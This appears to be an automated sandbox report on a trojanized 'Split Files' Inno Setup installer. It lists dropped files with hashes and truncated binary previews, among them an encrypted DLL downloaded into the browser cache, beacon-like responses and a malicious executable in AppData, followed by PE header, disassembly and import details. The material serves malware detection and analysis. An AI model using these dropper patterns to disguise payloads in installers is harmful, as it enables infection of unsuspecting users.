                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou

                C:\Program Files (x86)\Split Files\language\is-FNEKR.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....

                C:\Program Files (x86)\Split Files\language\is-OOV97.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag

                C:\Program Files (x86)\Split Files\unins000.dat

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:InnoSetup Log Split Files {215D64A9-0240-4952-9F4D-4D0A65391F2C}, version 0x2a, 4440 bytes, 675052\user, "C:\Program Files (x86)\Split Files"
                Category:dropped
                Size (bytes):4440
                Entropy (8bit):4.696747257913879
                Encrypted:false
                SSDEEP:48:kYTDpyMlLBv8rD85pPmUIrBdcoINLFhqkLVO3471hD5WpPLDfDxLDvvDHD1DoDvO:kGZp8rD85pPmaoINFhqYOIhHeSk9Wi
                MD5:92C5A142DFAAB141F3EF09BCE0B367ED
                SHA1:739EE47E9505A9A816858EB336A6BD224331BB8A
                SHA-256:F3703AB0D05D332938701CA07FF8980B80FACEDA3ACE1738512334F2F2D25272
                SHA-512:19AF8D235779FB7784A64D9AD64FE83CDECE3DA47E7C1BA1540FBB3BF29986662A3B7732660A3D7908208D3B9E659874C78D9F5981EB41705437FC7A8662AADE
                Malicious:false
                Preview:Inno Setup Uninstall Log (b)....................................{215D64A9-0240-4952-9F4D-4D0A65391F2C}}.........................................................................................Split Files.....................................................................................................................*.......X...%.................................................................................................................Da....s......~......B....675052.user"C:\Program Files (x86)\Split Files...........8...}.. ..........R.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMetr

                C:\Program Files (x86)\Split Files\unins000.exe (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

                C:\Program Files (x86)\Split Files\webpage.url (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:data
                Category:dropped
                Size (bytes):94224
                Entropy (8bit):7.998072640845361
                Encrypted:true
                SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                MD5:418619EA97671304AF80EC60F5A50B62
                SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                Malicious:false
                Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ping[1].htm

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):17
                Entropy (8bit):3.1751231351134614
                Encrypted:false
                SSDEEP:3:nCmxEl:Cmc
                MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                Malicious:false
                Preview:UwUoooIIrwgh24uuU

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\library[1].htm

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\count[1].htm

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\library[1].htm

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0

                C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):778752
                Entropy (8bit):6.357908612813808
                Encrypted:false
                SSDEEP:12288:cpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOG:2mt2bfrP437QzH/A6A7E7dVPUxOG
                MD5:E8176050192FBB976D70238E3C121F4C
                SHA1:2F1FD24EFE1F3F3FEE775CC3F5255B32F8880900
                SHA-256:AB4FE42A7B708DDB648BB2088216FF47B877AE599FD52FF50359FC1DB8E11EF7
                SHA-512:27EDF7A71C6546F1AB52E7EF97E404975DDD237D6C2D1038D24A49EAB724971884510F00F427C713ADB105857A0B12C7D57CA1CA1C70A6CEFED4BE619C345F4C
                Malicious:true
                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

                C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_iscrypt.dll

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2560
                Entropy (8bit):2.8818118453929262
                Encrypted:false
                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                MD5:A69559718AB506675E907FE49DEB71E9
                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_setup64.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.226829458093667
                Encrypted:false
                SSDEEP:48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
                MD5:9E5BA8A0DB2AE3A955BEE397534D535D
                SHA1:EF08EF5FAC94F42C276E64765759F8BC71BF88CB
                SHA-256:08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
                SHA-512:229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_shfoldr.dll

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):23312
                Entropy (8bit):4.596242908851566
                Encrypted:false
                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe

                Download File
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):73728
                Entropy (8bit):6.20389308045717
                Encrypted:false
                SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
                MD5:3FB36CB0B7172E5298D2992D42984D06
                SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
                SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
                SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
                Entropy (8bit):7.9318000564899
                TrID:
                • Win32 Executable (generic) a (10002005/4) 98.88%
                • Inno Setup installer (109748/4) 1.08%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:2094367
                MD5:e0f8085c7cb8eb9cf1c263bb12cfc6df
                SHA1:a109ebcf251a1e69923c60330994190e40ab466c
                SHA256:a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
                SHA512:11f39030a9e5f5a095c85aa087fe949ed7e83e1a53a3df487baab09a38d5e744150a8d4e7b34eaec28678561861e640cb34231b893a7f38751f143d0ea1305d1
                SSDEEP:49152:XirWlOmsJ8sSNd3HEKBqd0yLaS1vNf+8UkqBx:XiClONJu3HEKBqd0yLaGFfvqH
                TLSH:9FA51232715472EEFCE369B0584F426D66236FB3A1A87E2E310A37365A61331F115F1A
                File Content Preview:MZP.....................@.......................Inno....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                File Icon

                Icon Hash:b8ba6cc880e1f204

                Static PE Info

                General

                Entrypoint:0x409820
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:1
                OS Version Minor:0
                File Version Major:1
                File Version Minor:0
                Subsystem Version Major:1
                Subsystem Version Minor:0
                Import Hash:e92b45c54aa05ec107d5ef90662e6b33

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFD4h
                push ebx
                push esi
                push edi
                xor eax, eax
                mov dword ptr [ebp-10h], eax
                mov dword ptr [ebp-1Ch], eax
                call 00007F84649FAB4Bh
                call 00007F84649FBDF6h
                call 00007F84649FDFF9h
                call 00007F84649FE040h
                call 00007F8464A00637h
                call 00007F8464A0079Eh
                mov esi, 0040BDE0h
                xor eax, eax
                push ebp
                push 00409F05h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                xor edx, edx
                push ebp
                push 00409EBBh
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                mov eax, dword ptr [0040B014h]
                call 00007F8464A0118Fh
                call 00007F8464A00D4Eh
                lea edx, dword ptr [ebp-10h]
                xor eax, eax
                call 00007F84649FE4B4h
                mov edx, dword ptr [ebp-10h]
                mov eax, 0040BDD4h
                call 00007F84649FABF7h
                push 00000002h
                push 00000000h
                push 00000001h
                mov ecx, dword ptr [0040BDD4h]
                mov dl, 01h
                mov eax, 00407158h
                call 00007F84649FEB9Bh
                mov dword ptr [0040BDD8h], eax
                xor edx, edx
                push ebp
                push 00409E99h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                lea edx, dword ptr [ebp-18h]
                mov eax, dword ptr [0040BDD8h]
                call 00007F84649FEC97h
                mov ebx, dword ptr [ebp-18h]
                mov edx, 00000030h
                mov eax, dword ptr [0040BDD8h]
                call 00007F84649FEDD1h
                mov edx, esi
                mov ecx, 0000000Ch

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xc0000x8f0.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x1f558.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000x0.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xe0000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                CODE0x10000x8f940x9000False0.6195203993055556data6.591638965772245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA0xa0000x2480x400False0.306640625data2.7093261929320986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS0xb0000xe640x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xc0000x8f00xa00False0.3953125data4.294209855544776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls0xd0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0xe0000x180x200False0.052734375data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc0xf0000x8840x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc0x100000x1f5580x1f600False0.37483659113545814data4.9335056025106585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x1039c0x51f3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                RT_ICON0x155900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States
                RT_ICON0x25db80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States
                RT_ICON0x29fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States
                RT_ICON0x2c5880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States
                RT_ICON0x2d6300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States
                RT_ICON0x2dfb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States
                RT_STRING0x2e4200x2f2data
                RT_STRING0x2e7140x30cdata
                RT_STRING0x2ea200x2cedata
                RT_STRING0x2ecf00x68data
                RT_STRING0x2ed580xb4data
                RT_STRING0x2ee0c0xaedata
                RT_GROUP_ICON0x2eebc0x68dataEnglishUnited States
                RT_VERSION0x2ef240x3a8dataEnglishUnited States
                RT_MANIFEST0x2f2cc0x289XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                Imports

                DLLImport
                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                user32.dllMessageBoxA
                oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
